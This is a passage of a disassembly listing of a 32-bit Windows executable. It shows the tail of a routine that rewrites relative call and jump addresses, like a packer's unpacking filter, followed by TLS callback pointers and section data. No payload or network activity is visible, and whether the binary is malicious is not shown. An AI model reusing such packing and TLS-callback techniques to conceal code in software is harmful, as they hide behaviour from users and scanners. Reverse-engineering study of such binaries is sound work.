and ecx, 0FFFFFFFEh
cmp ecx, 20h
jnb loc_4317FA
xor ecx, ecx
mov ch, dl
mov cl, [eax+edi+3]
movzx edx, byte ptr [eax+edi+2]
shl ecx, 8
or ecx, edx
movzx edx, byte ptr [eax+edi+1]
shl ecx, 8
or edx, ecx
loc_431784: ; CODE XREF: sub_4316A2+125�j
sub edx, eax
sub edx, [ebp+arg_8]
sub edx, 5
cmp dword ptr [esi], 0
mov ebx, edx
jz short loc_4317CC
mov ecx, [ebp+arg_4]
push 18h
movzx edi, [ebp+ecx+var_C]
mov ecx, edi
shl ecx, 3
mov edx, ecx
pop ecx
sub ecx, edx
mov edx, ebx
shr edx, cl
test dl, dl
jz short loc_4317B4
cmp dl, 0FFh
jnz short loc_4317C9
loc_4317B4: ; CODE XREF: sub_4316A2+10B�j
push 4
pop ecx
sub ecx, edi
push 1
shl ecx, 3
pop edx
mov edi, [ebp+arg_0]
shl edx, cl
dec edx
xor edx, ebx
jmp short loc_431784
; ---------------------------------------------------------------------------
loc_4317C9: ; CODE XREF: sub_4316A2+110�j
mov edi, [ebp+arg_0]
loc_4317CC: ; CODE XREF: sub_4316A2+EF�j
mov ecx, ebx
add eax, 5
shr ecx, 18h
and cl, 1
dec cl
not cl
mov [eax+edi-1], cl
mov ecx, ebx
shr ecx, 10h
mov [eax+edi-2], cl
mov ecx, ebx
shr ecx, 8
mov [eax+edi-3], cl
mov [eax+edi-4], bl
and dword ptr [esi], 0
jmp short loc_43180E
; ---------------------------------------------------------------------------
loc_4317FA: ; CODE XREF: sub_4316A2+9B�j
; sub_4316A2+B4�j ...
or dword ptr [esi], 1
mov ecx, [esi]
inc eax
test dl, dl
jz short loc_431809
cmp dl, 0FFh
jnz short loc_43180E
loc_431809: ; CODE XREF: sub_4316A2+160�j
or ecx, 10h
mov [esi], ecx
loc_43180E: ; CODE XREF: sub_4316A2+61�j
; sub_4316A2+156�j ...
cmp eax, [ebp+var_4]
jbe loc_4316F2
pop edi
pop esi
pop ebx
leave
retn
sub_4316A2 endp
; ---------------------------------------------------------------------------
align 10h
off_431820 dd offset asc_421000 ; DATA XREF: start+255�w start+269�r ...
; "^"
dword_431824 dd 89E600h ; DATA XREF: start+22C�w start+232�r ...
dword_431828 dd 0E09Bh ; DATA XREF: start+242�w start+2EA�w ...
dd 30304h, 30234h, 30228h, 2 dup(0)
dd 3032Ch, 3025Ch, 5 dup(0)
dword_43185C dd 0D4h, 20000h, 0E09Bh, 200h, 21000h, 20000h, 30A39h
; DATA XREF: .ex_cod:off_430024�o
dd 400000h, 10Fh, 204E0h, 0
dd 1, 7 dup(0)
TlsDirectory dd 0
TlsEnd_ptr dd 0
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsCallbacks
TlsSizeOfZeroFill dd 0
TlsCharacteristics dd 0
dd 1, 0
dd 0EA00h, 4, 1, 200h, 0AA00h, 1000h, 15FE7h, 0E0000060h
dd 1, 200h, 800h, 17000h, 0E4Ch, 0E0000060h, 1, 200h, 2C00h
dd 18000h, 7098h, 0E0000060h, 1, 200h, 800h, 20000h, 667h
dd 0E0000060h, 3 dup(0)
_ex_cod ends
; Section 4. (virtual address 00032000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00031A00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 432000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start